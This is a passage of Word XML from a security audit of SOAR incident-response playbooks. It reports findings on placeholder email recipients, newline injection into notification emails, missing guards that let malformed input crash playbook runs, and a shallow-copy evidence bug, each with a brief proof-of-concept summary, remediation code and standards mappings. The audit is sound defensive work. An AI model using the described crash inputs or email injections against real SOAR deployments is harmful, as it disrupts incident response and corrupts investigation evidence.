        <w:t xml:space="preserve">: The IR notification email ships with hardcoded placeholder addresses. If deployed unmodified, malware-confirmation emails go to a non-existent local mailbox (notifications silently lost) or, if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resolves externally, could leak event data. The addresses are also not derived from config, so recipient control is static (not attacker-controllable, which is the safe part). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not attacker-controlled; operational hygiene. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable; placeholder/test value shipped in content.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: source the recipient from a custom list / asset config and fail loudly if unset; do not ship routable placeholder addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 Initialization of a Resource with an Insecure Default; CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-6 Configuration Settings. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-14 — Unsanitised artifact data in notification email body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Conditionally exploitable (content spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/email_notification_for_malware.py:272-308</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The email body is assembled from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hunt_file_1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hunt_file_2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hostnames, hashes and vault IDs via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t>. The email is plaintext (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>send email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMTP), so classic HTML injection is limited, but attacker-chosen hostnames/filenames can inject newline/header-like content or misleading text into the analyst notification. Low impact. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF-derived. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable (content spoofing only).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: strip CR/LF and control chars from interpolated values; if ever switched to HTML, HTML-encode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-93; CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-12 — Unguarded dict/list/regex access on connector and artifact data (crash / DoS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.6). Exploitability: Exploitable for availability only (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/AD_LDAP_Entity_Attribute_Lookup.py:90-91,120-129; Azure_AD_Graph_User_Attribute_Lookup.py:82; Attribute_Lookup_Dispatch.py:157-163; ServiceNow_Related_Tickets_Search.py:230; Splunk_Attack_Analyzer_Dynamic_Analysis.py:303,305; CrowdStrike_OAuth_API_Endpoint_Analysis.py:276,449,772; Jira_Related_Tickets_Search.py:262,281</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: Many blocks index connector results and artifact CEF directly (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['key']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.group(0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) with no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/length/None guard. Attacker-shaped or merely incomplete data (a UPN without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, an empty result list, a missing field, a None score during an in-progress sandbox phase) raises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>KeyError</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IndexError</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and aborts the playbook. For enrichment that is a reliability bug; for a response chain a mid-run abort can leave the system half-actioned (e.g. a session created but not deleted). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: artifact/connector data -&gt; unguarded access. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable for availability only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (crash/DoS of the playbook run), not for code execution. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, real output): case 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Attribute_Lookup_Dispatch.create_entity_artifact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>KeyError 'source'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; case 7 Azure UPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>svc_backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IndexError: list index out of range</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; case 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> observable -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError string indices must be integers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; case 4 string verdict -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with defaults, guard list access with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if seq:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>len()</w:t>
      </w:r>
      <w:r>
        <w:t>, and skip-with-log rather than index blindly. Example for the UPN split:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>upn = user.get('userPrincipalName') or ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>domain = upn.split('@')[1] if '@' in upn else ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-248; CWE-754 Improper Check for Unusual or Exceptional Conditions; CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-14 — Shallow-copy bug mislabels interaction artifacts in Automated Email Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.6). Exploitability: Evidence integrity (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/Splunk_Automated_Email_Investigation.py:334-362</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>335  artifact = {'label': url_interaction_label, 'name': 'Interaction with suspect url', ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>336  identifier_activity = url_act.pop('identifier_activity', [])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>341  for item in identifier_activity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>342      sub_artifact = artifact.copy()          # shallow copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>343      sub_artifact['cef']['identifier_activity'] = item   # all copies share the SAME cef dict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>344      aggregate_data__json.append(sub_artifact)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact.copy()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a shallow copy, so every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sub_artifact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shares one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dict. Assigning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sub_artifact['cef']['identifier_activity'] = item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mutates that shared dict in place, so after the loop all appended artifacts show the *last* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. When several users interacted with a suspect URL/file, the generated "Interaction with suspect url/file" artifacts all point to the same (last) user, losing the others - an evidence-integrity bug in a phishing investigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: driven by investigation data about attacker IoCs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable for integrity of produced artifacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not a product sink). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case 5, real output): two </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identifier_activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entries (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alice/WS01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bob/WS02</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) produced two artifacts both with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identifier_activity -&gt; {'user': 'bob', 'host': 'WS02'}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: deep-copy per item, or build each cef fresh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for item in identifier_activity:</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sub = copy.deepcopy(artifact)</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sub['cef']['identifier_activity'] = item</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aggregate_data__json.append(sub)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-471; CWE-573. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
